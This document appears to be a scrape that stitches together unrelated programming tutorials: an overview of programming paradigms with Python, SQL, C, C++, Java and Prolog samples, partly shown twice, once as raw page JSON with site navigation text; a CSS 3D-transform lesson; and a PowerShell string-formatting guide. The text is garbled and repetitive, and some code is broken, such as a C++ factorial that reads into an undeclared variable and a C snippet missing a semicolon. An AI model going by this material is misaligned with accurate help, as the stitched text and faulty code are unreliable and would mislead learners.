Functional programming paradigm – The functional programming paradigm has its roots in mathematics, and it is language independent. The key principle of this paradigm is the execution of a series of mathematical functions. The central model for the abstraction is the function, which is meant for some specific computation, not the data structure. Data are loosely coupled to functions. Functions hide their implementation. A function can be replaced with its value without changing the meaning of the program. Languages like Perl and JavaScript mostly use this paradigm. A short illustration follows the list of example languages below.

Examples of the functional programming paradigm:

JavaScript : developed by Brendan Eich
Haskell : developed by Lennart Augustsson, Dave Barton
Scala : developed by Martin Odersky
Erlang : developed by Joe Armstrong, Robert Virding
Lisp : developed by John McCarthy
ML : developed by Robin Milner
Clojure : developed by Rich Hickey
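The snippet below computes the sum of squares of the odd numbers in a list twice: once imperatively, mutating state step by step, and once functionally, as a composition of pure functions (Python is used here purely for illustration):

from functools import reduce

nums = [1, 2, 3, 4, 5]

# imperative: state mutated step by step
total = 0
for n in nums:
    if n % 2 == 1:
        total += n * n

# functional: what to compute, expressed as a composition of functions
total_fp = reduce(lambda a, b: a + b,
                  map(lambda n: n * n,
                      filter(lambda n: n % 2 == 1, nums)), 0)

assert total == total_fp == 35  # 1 + 9 + 25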
The next kind of approach is the database approach.

Database/data-driven programming approach – This programming methodology is based on data and its movement. Program statements are defined by data rather than by hard-coding a series of steps. A database program is the heart of a business information system and provides file creation, data entry, update, query and reporting functions. There are several programming languages developed mostly for database applications, for example SQL. It is applied to streams of structured data, for filtering, transforming, aggregating (such as computing statistics), or calling other programs. So it has its own wide application.

CREATE DATABASE databaseAddress;
CREATE TABLE Addr (
    PersonID int,
    LastName varchar(200),
    FirstName varchar(200),
    Address varchar(200),
    City varchar(200),
    State varchar(200)
);
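As a usage sketch, the Addr table above can be exercised from Python's built-in sqlite3 module (an in-memory database; the row values are made up, and the column types are simplified to SQLite's):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("""CREATE TABLE Addr (
    PersonID INTEGER, LastName TEXT, FirstName TEXT,
    Address TEXT, City TEXT, State TEXT)""")
conn.execute("INSERT INTO Addr VALUES (?, ?, ?, ?, ?, ?)",
             (1, "Doe", "Jane", "12 Main St", "Springfield", "IL"))
# declarative query: we state what we want, not how to fetch it
for row in conn.execute("SELECT FirstName, City FROM Addr WHERE State = 'IL'"):
    print(row)  # ('Jane', 'Springfield')
conn.close()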
[ { "code": null, "e": 25997, "s": 25969, "text": "\n25 Apr, 2022" }, { "code": null, "e": 26593, "s": 25997, "text": "Paradigm can also be termed as method to solve some problem or do some task. Programming paradigm is an approach to solve problem using some programming language or also we can say it is a method to solve a problem using tools and techniques that are available to us following some approach. There are lots for programming language that are known but all of them need to follow some strategy when they are implemented and this methodology/strategy is paradigms. Apart from varieties of programming language there are lots of paradigms to fulfill each and every demand. They are discussed below: " }, { "code": null, "e": 27025, "s": 26593, "text": "1. Imperative programming paradigm: It is one of the oldest programming paradigm. It features close relation to machine architecture. It is based on Von Neumann architecture. It works by changing the program state through assignment statements. It performs step by step task by changing state. The main focus is on how to achieve the goal. The paradigm consist of several statements and after execution of all the result is stored." }, { "code": null, "e": 27037, "s": 27025, "text": "Advantage: " }, { "code": null, "e": 27095, "s": 27037, "text": "Very simple to implementIt contains loops, variables etc." }, { "code": null, "e": 27120, "s": 27095, "text": "Very simple to implement" }, { "code": null, "e": 27154, "s": 27120, "text": "It contains loops, variables etc." }, { "code": null, "e": 27170, "s": 27154, "text": "Disadvantage: " }, { "code": null, "e": 27273, "s": 27170, "text": "Complex problem cannot be solvedLess efficient and less productiveParallel programming is not possible" }, { "code": null, "e": 27306, "s": 27273, "text": "Complex problem cannot be solved" }, { "code": null, "e": 27341, "s": 27306, "text": "Less efficient and less productive" }, { "code": null, "e": 27378, "s": 27341, "text": "Parallel programming is not possible" }, { "code": null, "e": 27570, "s": 27378, "text": "Examples of Imperative programming paradigm:\n\nC : developed by Dennis Ritchie and Ken Thompson\nFortan : developed by John Backus for IBM\nBasic : developed by John G Kemeny and Thomas E Kurtz " }, { "code": null, "e": 27572, "s": 27570, "text": "C" }, { "code": "// average of five number in C int marks[5] = { 12, 32, 45, 13, 19 } int sum = 0;float average = 0.0;for (int i = 0; i < 5; i++) { sum = sum + marks[i];}average = sum / 5;", "e": 27747, "s": 27572, "text": null }, { "code": null, "e": 27883, "s": 27747, "text": "Imperative programming is divided into three broad categories: Procedural, OOP and parallel processing. These paradigms are as follows:" }, { "code": null, "e": 28177, "s": 27883, "text": "Procedural programming paradigm – This paradigm emphasizes on procedure in terms of under lying machine model. There is no difference in between procedural and imperative approach. It has the ability to reuse the code and it was boon at that time when it was in use because of its reusability." 
}, { "code": null, "e": 28438, "s": 28177, "text": "Examples of Procedural programming paradigm:\n\nC : developed by Dennis Ritchie and Ken Thompson\nC++ : developed by Bjarne Stroustrup\nJava : developed by James Gosling at Sun Microsystems\nColdFusion : developed by J J Allaire\nPascal : developed by Niklaus Wirth " }, { "code": null, "e": 28442, "s": 28438, "text": "C++" }, { "code": "#include <iostream>using namespace std;int main(){ int i, fact = 1, num; cout << \"Enter any Number: \"; cin >> number; for (i = 1; i <= num; i++) { fact = fact * i; } cout << \"Factorial of \" << num << \" is: \" << fact << endl; return 0;}", "e": 28706, "s": 28442, "text": null }, { "code": null, "e": 28722, "s": 28706, "text": "Then comes OOP," }, { "code": null, "e": 29074, "s": 28722, "text": "Object oriented programming – The program is written as a collection of classes and object which are meant for communication. The smallest and basic entity is object and all kind of computation is performed on the objects only. More emphasis is on data rather procedure. It can handle almost all kind of real life problems which are today in scenario." }, { "code": null, "e": 29087, "s": 29074, "text": "Advantages: " }, { "code": null, "e": 29101, "s": 29087, "text": "Data security" }, { "code": null, "e": 29113, "s": 29101, "text": "Inheritance" }, { "code": null, "e": 29130, "s": 29113, "text": "Code reusability" }, { "code": null, "e": 29171, "s": 29130, "text": "Flexible and abstraction is also present" }, { "code": null, "e": 29562, "s": 29171, "text": "Examples of Object Oriented programming paradigm:\n\nSimula : first OOP language\nJava : developed by James Gosling at Sun Microsystems\nC++ : developed by Bjarne Stroustrup\nObjective-C : designed by Brad Cox\nVisual Basic .NET : developed by Microsoft\nPython : developed by Guido van Rossum\nRuby : developed by Yukihiro Matsumoto \nSmalltalk : developed by Alan Kay, Dan Ingalls, Adele Goldberg " }, { "code": null, "e": 29567, "s": 29562, "text": "Java" }, { "code": "import java.io.*; class GFG { public static void main(String[] args) { System.out.println(\"GfG!\"); Signup s1 = new Signup(); s1.create(22, \"riya\", \"[email protected]\", 'F', 89002); }} class Signup { int userid; String name; String emailid; char sex; long mob; public void create(int userid, String name, String emailid, char sex, long mob) { System.out.println(\"Welcome to GeeksforGeeks\\nLets create your account\\n\"); this.userid = 132; this.name = \"Radha\"; this.emailid = \"[email protected]\"; this.sex = 'F'; this.mob = 900558981; System.out.println(\"your account has been created\"); }}", "e": 30305, "s": 29567, "text": null }, { "code": null, "e": 30726, "s": 30305, "text": "Parallel processing approach – Parallel processing is the processing of program instructions by dividing them among multiple processors. A parallel processing system posses many numbers of processor with the objective of running a program in less time by dividing them. This approach seems to be like divide and conquer. Examples are NESL (one of the oldest one) and C/C++ also supports because of some library function." }, { "code": null, "e": 31429, "s": 30726, "text": "2. Declarative programming paradigm: It is divided as Logic, Functional, Database. In computer science the declarative programming is a style of building programs that expresses logic of computation without talking about its control flow. It often considers programs as theories of some logic.It may simplify writing parallel programs. 
The focus is on what needs to be done rather how it should be done basically emphasize on what code code is actually doing. It just declares the result we want rather how it has be produced. This is the only difference between imperative (how to do) and declarative (what to do) programming paradigms. Getting into deeper we would see logic, functional and database." }, { "code": null, "e": 32133, "s": 31429, "text": "Logic programming paradigms – It can be termed as abstract model of computation. It would solve logical problems like puzzles, series etc. In logic programming we have a knowledge base which we know before and along with the question and knowledge base which is given to machine, it produces result. In normal programming languages, such concept of knowledge base is not available but while using the concept of artificial intelligence, machine learning we have some models like Perception model which is using the same mechanism. In logical programming the main emphasize is on knowledge base and the problem. The execution of the program is very much like proof of mathematical statement, e.g., Prolog" }, { "code": null, "e": 32301, "s": 32133, "text": "sum of two number in prolog:\n\n predicates\n sumoftwonumber(integer, integer)\nclauses\n\n sum(0, 0).\n sum(n, r):-\n n1=n-1,\n sum(n1, r1),\n r=r1+n " }, { "code": null, "e": 32889, "s": 32301, "text": "Functional programming paradigms – The functional programming paradigms has its roots in mathematics and it is language independent. The key principle of this paradigms is the execution of series of mathematical functions. The central model for the abstraction is the function which are meant for some specific computation and not the data structure. Data are loosely coupled to functions.The function hide their implementation. Function can be replaced with their values without changing the meaning of the program. Some of the languages like perl, javascript mostly uses this paradigm." }, { "code": null, "e": 33218, "s": 32889, "text": "Examples of Functional programming paradigm:\n\nJavaScript : developed by Brendan Eich\nHaskell : developed by Lennart Augustsson, Dave Barton\nScala : developed by Martin Odersky\nErlang : developed by Joe Armstrong, Robert Virding\nLisp : developed by John Mccarthy\nML : developed by Robin Milner\nClojure : developed by Rich Hickey " }, { "code": null, "e": 33260, "s": 33218, "text": "The next kind of approach is of Database." }, { "code": null, "e": 33884, "s": 33260, "text": "Database/Data driven programming approach – This programming methodology is based on data and its movement. Program statements are defined by data rather than hard-coding a series of steps. A database program is the heart of a business information system and provides file creation, data entry, update, query and reporting functions. There are several programming languages that are developed mostly for database application. For example SQL. It is applied to streams of structured data, for filtering, transforming, aggregating (such as computing statistics), or calling other programs. So it has its own wide application." 
}, { "code": null, "e": 34086, "s": 33884, "text": "CREATE DATABASE databaseAddress;\nCREATE TABLE Addr (\n PersonID int,\n LastName varchar(200),\n FirstName varchar(200),\n Address varchar(200),\n City varchar(200),\n State varchar(200)\n); " }, { "code": null, "e": 34098, "s": 34086, "text": "ultralordps" }, { "code": null, "e": 34111, "s": 34098, "text": "khashayarkhm" }, { "code": null, "e": 34120, "s": 34111, "text": "rkbhola5" }, { "code": null, "e": 34134, "s": 34120, "text": "sumitgumber28" }, { "code": null, "e": 34157, "s": 34134, "text": "Object-Oriented-Design" }, { "code": null, "e": 34164, "s": 34157, "text": "Picked" }, { "code": null, "e": 34188, "s": 34164, "text": "Technical Scripter 2018" }, { "code": null, "e": 34203, "s": 34188, "text": "Design Pattern" }, { "code": null, "e": 34209, "s": 34203, "text": "GBlog" }, { "code": null, "e": 34307, "s": 34209, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 34359, "s": 34307, "text": "Unified Modeling Language (UML) | Sequence Diagrams" }, { "code": null, "e": 34397, "s": 34359, "text": "Factory method design pattern in Java" }, { "code": null, "e": 34413, "s": 34397, "text": "Adapter Pattern" }, { "code": null, "e": 34463, "s": 34413, "text": "Unified Modeling Language (UML) | An Introduction" }, { "code": null, "e": 34486, "s": 34463, "text": "Builder Design Pattern" }, { "code": null, "e": 34560, "s": 34486, "text": "Must Do Coding Questions for Companies like Amazon, Microsoft, Adobe, ..." }, { "code": null, "e": 34585, "s": 34560, "text": "DSA Sheet by Love Babbar" }, { "code": null, "e": 34620, "s": 34585, "text": "GET and POST requests using Python" }, { "code": null, "e": 34673, "s": 34620, "text": "Must Do Coding Questions for Product Based Companies" } ]
CSS 3D Transforms
CSS also supports 3D transformations.

In this chapter you will learn about the following CSS property:

transform

The numbers in the table specify the first browser version that fully supports the property.

With the CSS transform property you can use the following 3D transformation methods:

rotateX()
rotateY()
rotateZ()

The rotateX() method rotates an element around its X-axis at a given degree.

The rotateY() method rotates an element around its Y-axis at a given degree.

The rotateZ() method rotates an element around its Z-axis at a given degree.

With the transform property, rotate the <div> element 150deg around its X-axis.

<style>
div {
  width: 100px;
  height: 100px;
  background-color: lightblue;
  border: 1px solid black;
  : ;  /* fill in the property and value here */
}
</style>

<body>
  <div>This is a div</div>
</body>

Start the Exercise

The following table lists all the 3D transform properties:
[ { "code": null, "e": 38, "s": 0, "text": "CSS also supports 3D transformations." }, { "code": null, "e": 129, "s": 38, "text": "Mouse over the elements below to see the difference between a 2D \nand a 3D transformation:" }, { "code": null, "e": 194, "s": 129, "text": "In this chapter you will learn about the following CSS property:" }, { "code": null, "e": 204, "s": 194, "text": "transform" }, { "code": null, "e": 297, "s": 204, "text": "The numbers in the table specify the first browser version that fully supports the property." }, { "code": null, "e": 383, "s": 297, "text": "With the CSS transform property you can use \nthe following 3D transformation methods:" }, { "code": null, "e": 393, "s": 383, "text": "rotateX()" }, { "code": null, "e": 403, "s": 393, "text": "rotateY()" }, { "code": null, "e": 413, "s": 403, "text": "rotateZ()" }, { "code": null, "e": 490, "s": 413, "text": "The rotateX() method rotates an element around its X-axis at a given degree:" }, { "code": null, "e": 567, "s": 490, "text": "The rotateY() method rotates an element around its Y-axis at a given degree:" }, { "code": null, "e": 644, "s": 567, "text": "The rotateZ() method rotates an element around its Z-axis at a given degree:" }, { "code": null, "e": 725, "s": 644, "text": "With the transform property, rotate the <div> element 150deg around its X-axis.." }, { "code": null, "e": 891, "s": 725, "text": "<style>\ndiv {\n width: 100px;\n height: 100px;\n background-color: lightblue;\n border: 1px solid black;\n : ;\n}\n</style>\n\n<body>\n <div>This is a div</div>\n</body>\n" }, { "code": null, "e": 910, "s": 891, "text": "Start the Exercise" }, { "code": null, "e": 969, "s": 910, "text": "The following table lists all the 3D transform properties:" }, { "code": null, "e": 1002, "s": 969, "text": "We just launchedW3Schools videos" }, { "code": null, "e": 1044, "s": 1002, "text": "Get certifiedby completinga course today!" }, { "code": null, "e": 1151, "s": 1044, "text": "If you want to report an error, or if you want to make a suggestion, do not hesitate to send us an e-mail:" }, { "code": null, "e": 1170, "s": 1151, "text": "[email protected]" } ]
How to change the width and height of Twitter Bootstrap's tooltips? - GeeksforGeeks
31 Jan, 2020

Bootstrap tooltip: A Tooltip is used to provide interactive textual hints to the user about an element when the mouse pointer moves over it. It is a standard Bootstrap component that appears as a small pop-up when the user performs a specific action on an element: click, hover (the default), or focus. It also supports manual triggering for specific events.

In this article, we will design the tooltip first and then manipulate its height and width.

Create tooltip: The data-toggle="tooltip" attribute is used to create a tooltip. The title attribute is used to specify the text that should be displayed inside the tooltip.

Program:

<!DOCTYPE html>
<html lang="en">

<head>
    <title>Tooltip</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href=
"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
    <script src=
"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js">
    </script>
    <script src=
"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js">
    </script>
    <script src=
"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js">
    </script>
</head>

<body style="text-align:center;">
    <div class="container">
        <h1 style="color:green;"
            data-toggle="tooltip"
            title="Tooltip">
            GeeksforGeeks
        </h1>
    </div>

    <script>
        $(document).ready(function() {
            $('[data-toggle="tooltip"]').tooltip();
        });
    </script>
</body>

</html>

Output:

Changing width/height of tooltip: Here, we will modify the .tooltip-inner class by overriding some of its default CSS properties. Below is the implementation.
Program:<!DOCTYPE html> <html lang="en"> <head> <title>Tooltip</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href= "https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"> <script src= "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"> </script> <script src= "https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"> </script> <script src= "https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"> </script> <style> body { text-align:center; } h1 { color: green; } .tooltip-inner { width:200px; height:100px; padding:4px; } </style></head> <body> <div class="container"> <h1 data-toggle="tooltip" title="A Computer Science Portal for Geeks"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle="tooltip"]').tooltip(); }); </script> </body> </html> <!DOCTYPE html> <html lang="en"> <head> <title>Tooltip</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href= "https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"> <script src= "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"> </script> <script src= "https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"> </script> <script src= "https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"> </script> <style> body { text-align:center; } h1 { color: green; } .tooltip-inner { width:200px; height:100px; padding:4px; } </style></head> <body> <div class="container"> <h1 data-toggle="tooltip" title="A Computer Science Portal for Geeks"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle="tooltip"]').tooltip(); }); </script> </body> </html> Output: Attention reader! Don’t stop learning now. Get hold of all the important HTML concepts with the Web Design for Beginners | HTML course. Bootstrap-Misc CSS-Misc HTML-Misc Picked Technical Scripter 2019 Bootstrap HTML Technical Scripter Web Technologies Web technologies Questions HTML Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. How to Show Images on Click using HTML ? How to set Bootstrap Timepicker using datetimepicker library ? How to change the background color of the active nav-item? How to Use Bootstrap with React? Difference between Bootstrap 4 and Bootstrap 5 How to insert spaces/tabs in text using HTML/CSS? Top 10 Projects For Beginners To Practice HTML and CSS Skills How to update Node.js and NPM to next version ? How to set input type date in dd-mm-yyyy format using HTML ? Hide or show elements in HTML using display property
[ { "code": null, "e": 25104, "s": 25076, "text": "\n31 Jan, 2020" }, { "code": null, "e": 25465, "s": 25104, "text": "Bootstrap tooltip: A Tooltip is used to provide interactive textual hints to the user about the element when the mouse pointer moves over. Standardized bootstrap element collection like a small pop-up which appears whenever user performs any specific action click, hover(default), and focus on that element. It also supports manual trigger for specific events." }, { "code": null, "e": 25750, "s": 25465, "text": "In this article, we will design the tooltip first then we will manipulate the height and width of that tooltip.Create tooltip: The data-toggle=”tooltip” attribute is used to create a tooltip. The title attribute is used to specify the text that should be displayed inside the tooltip." }, { "code": null, "e": 26752, "s": 25750, "text": "Program:<!DOCTYPE html> <html lang=\"en\"> <head> <title>Tooltip</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <link rel=\"stylesheet\" href= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css\"> <script src= \"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"> </script> <script src= \"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js\"> </script> <script src= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js\"> </script> </head> <body style=\"text-align:center;\"> <div class=\"container\"> <h1 style=\"color:green;\" data-toggle=\"tooltip\" title=\"Tooltip\"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle=\"tooltip\"]').tooltip(); }); </script> </body> </html> " }, { "code": "<!DOCTYPE html> <html lang=\"en\"> <head> <title>Tooltip</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <link rel=\"stylesheet\" href= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css\"> <script src= \"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"> </script> <script src= \"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js\"> </script> <script src= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js\"> </script> </head> <body style=\"text-align:center;\"> <div class=\"container\"> <h1 style=\"color:green;\" data-toggle=\"tooltip\" title=\"Tooltip\"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle=\"tooltip\"]').tooltip(); }); </script> </body> </html> ", "e": 27746, "s": 26752, "text": null }, { "code": null, "e": 27754, "s": 27746, "text": "Output:" }, { "code": null, "e": 27958, "s": 27754, "text": "Changing width/height of tooltip: Here, we will modify the .tooltip-inner class for satisfying that demand by over-riding the some of the default CSS properties. Below is the implementation for the same." 
}, { "code": null, "e": 29261, "s": 27958, "text": "Program:<!DOCTYPE html> <html lang=\"en\"> <head> <title>Tooltip</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <link rel=\"stylesheet\" href= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css\"> <script src= \"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"> </script> <script src= \"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js\"> </script> <script src= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js\"> </script> <style> body { text-align:center; } h1 { color: green; } .tooltip-inner { width:200px; height:100px; padding:4px; } </style></head> <body> <div class=\"container\"> <h1 data-toggle=\"tooltip\" title=\"A Computer Science Portal for Geeks\"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle=\"tooltip\"]').tooltip(); }); </script> </body> </html> " }, { "code": "<!DOCTYPE html> <html lang=\"en\"> <head> <title>Tooltip</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <link rel=\"stylesheet\" href= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css\"> <script src= \"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"> </script> <script src= \"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js\"> </script> <script src= \"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js\"> </script> <style> body { text-align:center; } h1 { color: green; } .tooltip-inner { width:200px; height:100px; padding:4px; } </style></head> <body> <div class=\"container\"> <h1 data-toggle=\"tooltip\" title=\"A Computer Science Portal for Geeks\"> GeeksforGeeks </h1> </div> <script> $(document).ready(function() { $('[data-toggle=\"tooltip\"]').tooltip(); }); </script> </body> </html> ", "e": 30556, "s": 29261, "text": null }, { "code": null, "e": 30564, "s": 30556, "text": "Output:" }, { "code": null, "e": 30701, "s": 30564, "text": "Attention reader! Don’t stop learning now. Get hold of all the important HTML concepts with the Web Design for Beginners | HTML course." }, { "code": null, "e": 30716, "s": 30701, "text": "Bootstrap-Misc" }, { "code": null, "e": 30725, "s": 30716, "text": "CSS-Misc" }, { "code": null, "e": 30735, "s": 30725, "text": "HTML-Misc" }, { "code": null, "e": 30742, "s": 30735, "text": "Picked" }, { "code": null, "e": 30766, "s": 30742, "text": "Technical Scripter 2019" }, { "code": null, "e": 30776, "s": 30766, "text": "Bootstrap" }, { "code": null, "e": 30781, "s": 30776, "text": "HTML" }, { "code": null, "e": 30800, "s": 30781, "text": "Technical Scripter" }, { "code": null, "e": 30817, "s": 30800, "text": "Web Technologies" }, { "code": null, "e": 30844, "s": 30817, "text": "Web technologies Questions" }, { "code": null, "e": 30849, "s": 30844, "text": "HTML" }, { "code": null, "e": 30947, "s": 30849, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 30988, "s": 30947, "text": "How to Show Images on Click using HTML ?" }, { "code": null, "e": 31051, "s": 30988, "text": "How to set Bootstrap Timepicker using datetimepicker library ?" }, { "code": null, "e": 31110, "s": 31051, "text": "How to change the background color of the active nav-item?" }, { "code": null, "e": 31143, "s": 31110, "text": "How to Use Bootstrap with React?" 
}, { "code": null, "e": 31190, "s": 31143, "text": "Difference between Bootstrap 4 and Bootstrap 5" }, { "code": null, "e": 31240, "s": 31190, "text": "How to insert spaces/tabs in text using HTML/CSS?" }, { "code": null, "e": 31302, "s": 31240, "text": "Top 10 Projects For Beginners To Practice HTML and CSS Skills" }, { "code": null, "e": 31350, "s": 31302, "text": "How to update Node.js and NPM to next version ?" }, { "code": null, "e": 31411, "s": 31350, "text": "How to set input type date in dd-mm-yyyy format using HTML ?" } ]
Why isn't sizeof for a struct equal to the sum of sizeof of each member in C/C++?
The size of a struct reported by sizeof() is not always equal to the sum of the sizes of its individual members. Compilers add padding to satisfy alignment requirements, so the size may change. Padding is added when a structure member is followed by a member with a larger alignment requirement, or at the end of the structure. Different compilers have different alignment constraints; in the C standard, the overall alignment of a structure is implementation-defined.

In the first case, the double z is 8 bytes long, which is larger than x (4 bytes), so 4 bytes of padding are added after x. The short y occupies 2 bytes, and 6 bytes of tail padding are added so that the structure size is a multiple of 8.

#include <stdio.h>

struct myStruct {
    int x;       // 4 bytes, followed by 4 bytes of padding
    double z;    // 8 bytes, no padding
    short int y; // 2 bytes, followed by 6 bytes of tail padding
};

int main() {
    printf("Size of struct: %zu", sizeof(struct myStruct));
    return 0;
}

Size of struct: 24

In the second case the double comes first and takes 8 bytes. The integer x (4 bytes) is added next, and the short y (2 bytes) fits into the remainder of the same 8-byte block; only 2 bytes of tail padding are needed, for a total of 16 bytes.

#include <stdio.h>

struct myStruct {
    double z;    // 8 bytes, no padding
    int x;       // 4 bytes, no padding
    short int y; // 2 bytes, followed by 2 bytes of tail padding
};

int main() {
    printf("Size of struct: %zu", sizeof(struct myStruct));
    return 0;
}

Size of struct: 16

The third case also takes 16 bytes of memory, but the arrangement is different. The double is placed first, then the short. When the integer is inserted, 2 bytes of padding are placed after the short so that the int is 4-byte aligned, and the int fills the last 4 bytes; no padding is required after it.

#include <stdio.h>

struct myStruct {
    double z;    // 8 bytes, no padding
    short int y; // 2 bytes, followed by 2 bytes of padding
    int x;       // 4 bytes, no padding
};

int main() {
    printf("Size of struct: %zu", sizeof(struct myStruct));
    return 0;
}

Size of struct: 16
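As a supplementary check (this sketch is not from the original answer, and it assumes a typical 64-bit platform where int is 4 bytes, short is 2, and double is 8), Python's ctypes module lays structures out with the platform's native alignment rules, so the same padding can be observed without compiling any C:

import ctypes

# Same member order as the first C example: int, double, short
class MyStruct(ctypes.Structure):
    _fields_ = [("x", ctypes.c_int),     # 4 bytes, then 4 bytes of padding
                ("z", ctypes.c_double),  # 8 bytes
                ("y", ctypes.c_short)]   # 2 bytes, then 6 bytes of tail padding

# Members reordered as in the second example: double, int, short
class MyStructReordered(ctypes.Structure):
    _fields_ = [("z", ctypes.c_double),
                ("x", ctypes.c_int),
                ("y", ctypes.c_short)]

print(ctypes.sizeof(MyStruct))           # typically 24
print(ctypes.sizeof(MyStructReordered))  # typically 16

# Inspecting field offsets shows exactly where the padding sits
for name, _ in MyStruct._fields_:
    print(name, getattr(MyStruct, name).offset)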
[ { "code": null, "e": 1526, "s": 1062, "text": "The size of a struct type element taken by sizeof() is not always equal to the size of each individual member. Sometimes the compilers add some padding to avoid alignment issues. So the size may change. The padding is added when a structure member is followed by a member with a larger size or at the end of the structure. Different compiler has different types of alignment constraints. In C standard, the total alignment structure depends on the implementation." }, { "code": null, "e": 1726, "s": 1526, "text": "In this case the double z is 8-byte long, which is larger than x (4-byte). So another 4-byte padding is added. Also short type data y has 2-byte space in memory so extra 6-bytes are added as padding." }, { "code": null, "e": 2001, "s": 1726, "text": "#include <stdio.h>\nstruct myStruct {\n int x; //Integer takes 4 bytes, and padding 4 bytes\n double z; //Size of double is 8-byte, no padding\n short int y; //Size of short is 2-byte, padding 6-bytes\n};\nmain() {\n printf(\"Size of struct: %d\", sizeof(struct myStruct));\n}" }, { "code": null, "e": 2020, "s": 2001, "text": "Size of struct: 24" }, { "code": null, "e": 2279, "s": 2020, "text": "In this case the double is inserted at first, and it takes 8-bytes of space. Now the integer x (4-byte) is added. So there is another 4-byte space. When the short y is added, it can be placed into that extra 4-byte space and occupies total 16-bytes of space." }, { "code": null, "e": 2554, "s": 2279, "text": "#include <stdio.h>\nstruct myStruct {\n double z; //Size of double is 8-byte, no padding\n int x; //Integer takes 4 bytes, and padding 4 bytes\n short int y; //Size of short is 2-byte, padding 6-bytes\n};\nmain() {\n printf(\"Size of struct: %d\", sizeof(struct myStruct));\n}" }, { "code": null, "e": 2573, "s": 2554, "text": "Size of struct: 16" }, { "code": null, "e": 2939, "s": 2573, "text": "In the third case it also takes 16-byte of memory space, but the arrangements are different. As the first member is double then it is placed at first, then the short type data is added. Now when the integer is trying to insert, it can be placed into the remaining 6-byte area. So one padding is present after short but no padding is required after the integer data." }, { "code": null, "e": 3214, "s": 2939, "text": "#include <stdio.h>\nstruct myStruct {\n double z; //Size of double is 8-byte, no padding\n short int y; //Size of short is 2-byte, padding 6-bytes\n int x; //Integer takes 4 bytes, and padding 4 bytes\n};\nmain() {\n printf(\"Size of struct: %d\", sizeof(struct myStruct));\n}" }, { "code": null, "e": 3233, "s": 3214, "text": "Size of struct: 16" } ]
How to format string using PowerShell?
To format a string in PowerShell, we can use various methods. First, simple string expansion (variable interpolation inside double quotes):

PS C:\> $str = 'PowerShell'
PS C:\> Write-Output "Hello $str !!!!"
Hello PowerShell !!!!

Second, the format method. In this method, we use the Format function of the .NET String class.

PS C:\> $str = "PowerShell"
PS C:\> [String]::Format("Hello $str...!!!")
Hello PowerShell...!!!

The third method uses the format operator (-f). We can use numbered placeholders here, as shown below.

PS C:\> $str = 'PowerShell'
PS C:\> "Hello {0}" -f $str
Hello PowerShell

If we have multiple variables, we need to increase the numbers inside the curly brackets. For example,

PS C:\> $str = "PowerShell"
PS C:\> $str1 = "Azure"
PS C:\> "Hello {0} and {1}" -f $str,$str1
Hello PowerShell and Azure

You can also use the same numbered placeholders inside the Format method.

PS C:\> [String]::Format("Hello {0} and {1}", $str,$str1)
Hello PowerShell and Azure
